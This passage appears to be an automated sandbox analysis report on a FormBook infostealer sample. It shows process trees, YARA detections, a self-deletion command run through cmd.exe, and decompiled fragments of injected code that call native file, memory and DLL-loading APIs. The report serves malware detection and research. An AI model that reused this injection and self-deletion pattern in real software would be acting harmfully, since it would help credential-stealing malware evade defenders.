                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: NETSTAT.EXE PID: 3204 Parent PID: 3472

                                                                    General

                                                                    Start time:20:58:05
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                    Imagebase:0xb70000
                                                                    File size:32768 bytes
                                                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: cmd.exe PID: 1844 Parent PID: 3204

                                                                    General

                                                                    Start time:20:58:09
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: conhost.exe PID: 4308 Parent PID: 1844

                                                                    General

                                                                    Start time:20:58:10
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: Fu94e0b1TR.exe PID: 4628 Parent PID: 6048 Fu94e0b1TR.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00F5A2D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5A516
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: 6NE
                                                                      • API String ID: 4139908857-2481008274
                                                                      • Opcode ID: 092c835eb820b15c197c68d98dfbee161781e564ce3d9193d23b042e70a83135
                                                                      • Instruction ID: a99783443f216ad5ad0fdbab6ecbd3f6cb72700cd9c725ced98bcbcdfb8b8b4b
                                                                      • Opcode Fuzzy Hash: 092c835eb820b15c197c68d98dfbee161781e564ce3d9193d23b042e70a83135
                                                                      • Instruction Fuzzy Hash: B7716770A00B058FD724CF69C04179ABBF1FF88314F008A2DD586DBA50DB75E959CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5C7F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F5C7BE,?,?,?,?,?), ref: 00F5C87F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: 6NE
                                                                      • API String ID: 3793708945-2481008274
                                                                      • Opcode ID: 37d02e3b38ad6c0ce0053eadddcb4fa345b6f53c0b1cf3e46e0a9f2528a6f298
                                                                      • Instruction ID: fd60fab051c637ad70f24ac849bc98dff9510775dad89e8be87f6cc0ec09bcbc
                                                                      • Opcode Fuzzy Hash: 37d02e3b38ad6c0ce0053eadddcb4fa345b6f53c0b1cf3e46e0a9f2528a6f298
                                                                      • Instruction Fuzzy Hash: 332105B5D002089FDB10CFA9D585ADEBBF8FB48320F14841AE954A7210D374A955CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5AFFC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F5C7BE,?,?,?,?,?), ref: 00F5C87F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: 6NE
                                                                      • API String ID: 3793708945-2481008274
                                                                      • Opcode ID: 909cafa645425920e5243f31281382ee99e55b46323f64df3b8a22b9ae5a92aa
                                                                      • Instruction ID: 6aec7531d6374ca4942f5db03496becd4fb2bf7788a48f44dfde89661df56d7b
                                                                      • Opcode Fuzzy Hash: 909cafa645425920e5243f31281382ee99e55b46323f64df3b8a22b9ae5a92aa
                                                                      • Instruction Fuzzy Hash: 4921E3B5D00309AFDB10CFA9D984ADEBBF8EB48324F14841AE915B7310D774A954DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5A731, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5A591,00000800,00000000,00000000), ref: 00F5A7A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: 6NE
                                                                      • API String ID: 1029625771-2481008274
                                                                      • Opcode ID: 8956b1cefed4ca0f8f8cbeaf850dadc97cd4efbf5597dc17699e55b7fba6c7d3
                                                                      • Instruction ID: 1ca28b6454e24b52108c18aba788a0eb26f77c641efc1989f032c2f2a3182a1a
                                                                      • Opcode Fuzzy Hash: 8956b1cefed4ca0f8f8cbeaf850dadc97cd4efbf5597dc17699e55b7fba6c7d3
                                                                      • Instruction Fuzzy Hash: FA1126B6D002099FCB10CFAAD584ADEFBF4EF88324F14852ED955A7200C775A54ACFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F59DA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F5A591,00000800,00000000,00000000), ref: 00F5A7A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: 6NE
                                                                      • API String ID: 1029625771-2481008274
                                                                      • Opcode ID: f00479f2fb034ac04acee7f37d088e60eb96364045128459e8d32e72f48b5cc1
                                                                      • Instruction ID: 7b1a0143033eced33cc428cff9d352261816970a899a087a805bd30280b43d09
                                                                      • Opcode Fuzzy Hash: f00479f2fb034ac04acee7f37d088e60eb96364045128459e8d32e72f48b5cc1
                                                                      • Instruction Fuzzy Hash: 291117B6D002099FDB10CF9AD544ADEFBF4EB48324F14852ED915A7200C375A959CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07131982, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 071319E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287859526.0000000007130000.00000040.00000001.sdmp, Offset: 07130000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID: 6NE
                                                                      • API String ID: 410705778-2481008274
                                                                      • Opcode ID: 34ae7da032ffd8cf01c103c8554c1bf7d9ca7df8bee2f14313dcdf0ffacfc72d
                                                                      • Instruction ID: e448fa8a218d0e07ab98435729812bc2da87fc15c3bb5184e35768e756ac7e3b
                                                                      • Opcode Fuzzy Hash: 34ae7da032ffd8cf01c103c8554c1bf7d9ca7df8bee2f14313dcdf0ffacfc72d
                                                                      • Instruction Fuzzy Hash: 091125B5800749AFCB20CF99C885BDFBFF8EB48324F108419E454A7600C374A594CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5A4B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F5A516
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: 6NE
                                                                      • API String ID: 4139908857-2481008274
                                                                      • Opcode ID: 579eb8f2e7aa6acdbe932b85616de0479cecafc5c2477e275c1d7a1fa7e1d52a
                                                                      • Instruction ID: c661b1ee1ab1c6a584aff856ecd5cf35042431d9cf9d0b8c0d87ccb540ecf600
                                                                      • Opcode Fuzzy Hash: 579eb8f2e7aa6acdbe932b85616de0479cecafc5c2477e275c1d7a1fa7e1d52a
                                                                      • Instruction Fuzzy Hash: B91102B5C006498FCB20CFAAC444ADEFBF4AB48324F14851AD959B7200D374A549CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 07131988, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 071319E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287859526.0000000007130000.00000040.00000001.sdmp, Offset: 07130000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID: 6NE
                                                                      • API String ID: 410705778-2481008274
                                                                      • Opcode ID: 26caf446138863f771647cc8eefa75ed7b811c1d9697653b2e9f270c7f3e4f0f
                                                                      • Instruction ID: 46012dd742c80b14a62dee8ede230806f2dad6f710f3741409d275f2ab265a0b
                                                                      • Opcode Fuzzy Hash: 26caf446138863f771647cc8eefa75ed7b811c1d9697653b2e9f270c7f3e4f0f
                                                                      • Instruction Fuzzy Hash: 581115B58007499FCB20CF9AC985BDEFBF8EB48324F108419E555A7200C374A584CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00F5F298, Relevance: .3, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d87013ee91d9a2f00cb4a0113c5f6ea614f0ef91f80b0da10280631f526ea5c2
                                                                      • Instruction ID: 95519bda5ba4f38ff79fa8c54357fc38de351e94f5c09f5e4f8355753b6feedb
                                                                      • Opcode Fuzzy Hash: d87013ee91d9a2f00cb4a0113c5f6ea614f0ef91f80b0da10280631f526ea5c2
                                                                      • Instruction Fuzzy Hash: E412C5F1F997468BD310CF65E5881A93BA0BF44328FD24A08D2625FAD1D7B4156ACFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5D064, Relevance: .3, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a98e006483e5d32421935f4778e047dd76b1e305012a92c5f679be2771df4c5c
                                                                      • Instruction ID: 5322410068e22bbaafdd2f87e05c74c6645210f95465e9587f922b95288c58a8
                                                                      • Opcode Fuzzy Hash: a98e006483e5d32421935f4778e047dd76b1e305012a92c5f679be2771df4c5c
                                                                      • Instruction Fuzzy Hash: 93A1A132E006198FCF19CFB5C8445DEBBB2FF89301B15856AE905BB221EB35A959DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00F5F296, Relevance: .2, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.276696878.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41847c195b1fad2a2bbbf130035f6ed99413c1a758f743cbd928bf92944a7fcd
                                                                      • Instruction ID: a98a7406c12029d9ee749cf08f82db4afa1096ed533378d37fce299945ad6be1
                                                                      • Opcode Fuzzy Hash: 41847c195b1fad2a2bbbf130035f6ed99413c1a758f743cbd928bf92944a7fcd
                                                                      • Instruction Fuzzy Hash: 21C13AB1F997058BD710CF65E8881A93B71BF84328FD24A08D2626F6D1D7B4146ACFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: Fu94e0b1TR.exe PID: 2848 Parent PID: 4628 Fu94e0b1TR.exeCOMMON

                                                                      Executed Functions

                                                                      Function 00418660, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 37%
                                                                      			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191B0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                      0x00418663
                                                                      0x0041866f
                                                                      0x00418677
                                                                      0x0041867c
                                                                      0x00418682
                                                                      0x0041869d
                                                                      0x004186a5
                                                                      0x004186a9

                                                                      APIs
                                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: !:A$b=A$b=A
                                                                      • API String ID: 2738559852-704622139
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B360(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004196F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                      0x00409b4c
                                                                      0x00409b4f
                                                                      0x00409b54
                                                                      0x00409b59
                                                                      0x00409b63
                                                                      0x00409b68
                                                                      0x00409b6b
                                                                      0x00409b6d
                                                                      0x00409b75
                                                                      0x00409b7a
                                                                      0x00409b7a
                                                                      0x00409b81
                                                                      0x00409b89
                                                                      0x00409b8c
                                                                      0x00409b8e
                                                                      0x00409ba2
                                                                      0x00000000
                                                                      0x00409ba4
                                                                      0x00409baa
                                                                      0x00409b5e
                                                                      0x00409b5e
                                                                      0x00409b5e

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
                                                                      • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004185AA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E004185AA(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;

				asm("aaa");
				_t17 = _a4;
				_t4 = _t17 + 0xc40; // 0xc40
				E004191B0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}




                                                                      0x004185aa
                                                                      0x004185b3
                                                                      0x004185bf
                                                                      0x004185c7
                                                                      0x004185fd
                                                                      0x00418601

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
                                                                      • Instruction ID: 18cb8f29c1dbb9be036894fa1e0555e78b2193662c4237a168eb9084fb89eb18
                                                                      • Opcode Fuzzy Hash: 4e49a2fd89a072ed91aee9cd768a19d0235fa107ff85c64f88b1ac8d2bbd6ddb
                                                                      • Instruction Fuzzy Hash: DA01BDB6241208AFDB48DF88DC95EEB77A9AF8C354F158258FA1D97240D630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004185B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191B0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                      0x004185bf
                                                                      0x004185c7
                                                                      0x004185fd
                                                                      0x00418601

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041878A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 37%
                                                                      			E0041878A(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t14;
				void* _t21;

				asm("aad 0x9d");
				asm("daa");
				asm("salc");
				_pop(ss);
				asm("ficom dword [ebp-0x75]");
				_t10 = _a8;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191B0(_t21, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t14;
			}





                                                                      0x0041878a
                                                                      0x0041878c
                                                                      0x0041878d
                                                                      0x0041878e
                                                                      0x0041878f
                                                                      0x00418793
                                                                      0x0041879f
                                                                      0x004187a7
                                                                      0x004187c9
                                                                      0x004187cd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
                                                                      • Instruction ID: 713eb8c923aafab32c3c2070b3ea3110a2081d86b7d44ffaf67b656759256371
                                                                      • Opcode Fuzzy Hash: 5b9e37ce0a83973ad8b8f99836c60f5d5bb11e8772e47040670453ea2243011c
                                                                      • Instruction Fuzzy Hash: D0F058B2200118AFCB24DF99CC81EEB77ADAF8C354F108208FA09A7241C631E910CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004186DA, Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E004186DA(void* __edx, void* __eflags, long _a4, void* _a8) {
				intOrPtr _v117;
				long* __esi;
				signed char _t6;
				void* _t11;

				asm("int 0xe7");
				asm("std");
				if(__eflags < 0) {
					return  *(_t6 | 0x0000008b)(__edx, es, _t11);
				} else {
					__eflags = __edx - _v117;
					__ebp = __esp;
					__eax = _a4;
					_t3 = __eax + 0x10; // 0x300
					_t4 = __eax + 0xc50; // 0x409753
					__esi = _t4;
					__eax = E004191B0(__edi, _a4, __esi,  *_t3, 0, 0x2c);
					__edx = _a8;
					__eax =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                                      0x004186da
                                                                      0x004186dc
                                                                      0x004186dd
                                                                      0x004186d9
                                                                      0x004186df
                                                                      0x004186df
                                                                      0x004186e1
                                                                      0x004186e3
                                                                      0x004186e6
                                                                      0x004186ef
                                                                      0x004186ef
                                                                      0x004186f7
                                                                      0x004186fc
                                                                      0x004186ff
                                                                      0x00418705
                                                                      0x00418707
                                                                      0x00418708
                                                                      0x00418709
                                                                      0x00418709

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
                                                                      • Instruction ID: 1851d21db6e1e0e433705d8b9bc6f96ef1dce32e760053031ea60e7465d993b7
                                                                      • Opcode Fuzzy Hash: d0a7aa98471bfcbc65870662297c25ead3115f6c031485053a1f14affa10e6b5
                                                                      • Instruction Fuzzy Hash: 41E068722001007BDB10EBE8DC85EEB772CDF84354F11416EF90CE7202CA30E2408AE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
